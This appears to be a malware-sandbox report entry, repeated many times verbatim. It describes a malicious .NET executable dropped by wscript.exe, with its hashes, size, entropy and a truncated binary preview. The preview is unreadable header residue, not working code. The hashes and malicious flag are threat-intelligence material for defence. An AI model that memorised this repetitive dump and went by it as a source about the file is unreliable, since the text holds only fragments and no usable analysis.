                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
